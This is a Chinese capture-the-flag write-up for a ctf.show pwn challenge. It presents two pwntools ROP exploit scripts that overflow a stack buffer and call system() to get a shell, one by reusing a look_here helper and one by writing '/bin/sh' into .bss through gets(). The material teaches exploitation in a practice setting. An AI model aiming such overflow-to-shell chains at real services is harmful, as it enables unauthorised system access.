0x00 第一种方法
查找字符串发现了可疑的/bin/ti
ROPgadget --binary pwn --string "ti"
获得ti的位置:
Strings information ============================================================ 0x000000000060104d : ti
有可以利用的函数look_here,它会把字符串的ascii-1:
/*
 * Decompiler output (pseudo-C: _BYTE / __fastcall are decompiler-style types).
 * Decrements each of the first two bytes at a1 by one, advancing a1 after each
 * byte. The returned pointer is the last value stored in `result`, i.e. the
 * address of the second byte (a1 before its final post-increment).
 */
_BYTE *__fastcall look_here(_BYTE *a1)
{
  _BYTE *result; // rax
  int i; // [rsp+14h] [rbp-4h]

  for ( i = 0; i <= 1; ++i )
  {
    result = a1;   // snapshot of the pointer before it is advanced below
    --*a1++;       // decrement the byte a1 points at, then step to the next byte
  }
  return result;
}
exp,结尾需要平衡栈:
# Method 1 (see the heading above): reuse the binary's own look_here() on the
# "ti" string found by the ROPgadget search, then call system() on the
# adjacent string. All addresses below are taken from this page.
from pwn import *
from LibcSearcher import *  # imported but not used anywhere in this script

elf = ELF('./pwn')
local = 1  # 1 -> run ./pwn locally, anything else -> connect to the remote service
if local == 1:
    io = process('./pwn')
else:
    io = remote('pwn.challenge.ctf.show',28133)

system_addr = elf.symbols['system']   # resolved from the binary's symbol table
pop_rdi_ret = 0x0000000000400733      # gadget address (given on this page)
ti = 0x000000000060104d               # "ti" string, from the ROPgadget --string output above
binsh = 0x601048                      # address passed to system() (given on this page)
lookhere = 0x40062D                   # look_here(), the decompiled function shown above
ret = 0x00000000004004d1              # bare `ret`; the page says it is there to balance the stack

# Chain: look_here(ti) -> system(binsh). The 0x2A0 padding and the 0xdeadbeef
# word presumably cover the buffer and the saved frame pointer -- confirm
# against the binary.
# NOTE(review): 'a'*0x2A0 is a str while p64() returns bytes; as written this
# concatenation only works under Python 2 -- under Python 3 it raises TypeError.
payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(ti)+p64(lookhere)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system_addr)
io.sendline(payload)
io.interactive()
0x01 第二种方法
不需要使用函数look_here,因为题中给了gets函数,利用它写一个“/bin/sh”即可。
需要把“/bin/sh”写入bss段中:
# Method 2 (see the heading above): instead of look_here(), call gets() to
# write "/bin/sh" into the .bss area, then call system() on it.
# All addresses below are taken from this page.
from pwn import *
from LibcSearcher import *  # imported but not used anywhere in this script

elf = ELF('./pwn')
local = 0  # 1 -> run ./pwn locally, anything else -> connect to the remote service
if local == 1:
    io = process('./pwn')
    #gdb.attach(io,'b * 0x04006B2')
else:
    io = remote('pwn.challenge.ctf.show',28133)

system_addr = elf.symbols['system']   # resolved from the binary's symbol table
gets_addr = elf.symbols['gets']       # resolved from the binary's symbol table
bss = 0x00601800                      # writable .bss address used as the gets() buffer (given on this page)
binsh = 0x601048                      # defined but not used in this script
ret = 0x00000000004004d1              # bare `ret`; the page says it is there to balance the stack
pop_rdi_ret = 0x0000000000400733      # gadget address (given on this page)

# Chain: gets(bss) -> system(bss). The 0x2A0 padding and the 0xdeadbeef word
# presumably cover the buffer and the saved frame pointer -- confirm against
# the binary.
# NOTE(review): 'a'*0x2A0 is a str while p64() returns bytes; as written this
# concatenation only works under Python 2 -- under Python 3 it raises TypeError.
payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(bss)+p64(gets_addr)+p64(pop_rdi_ret)+p64(bss)+p64(ret)+p64(system_addr)
io.sendline(payload)
io.sendline('/bin/sh')  # second line is what gets(bss) reads into the buffer
io.interactive()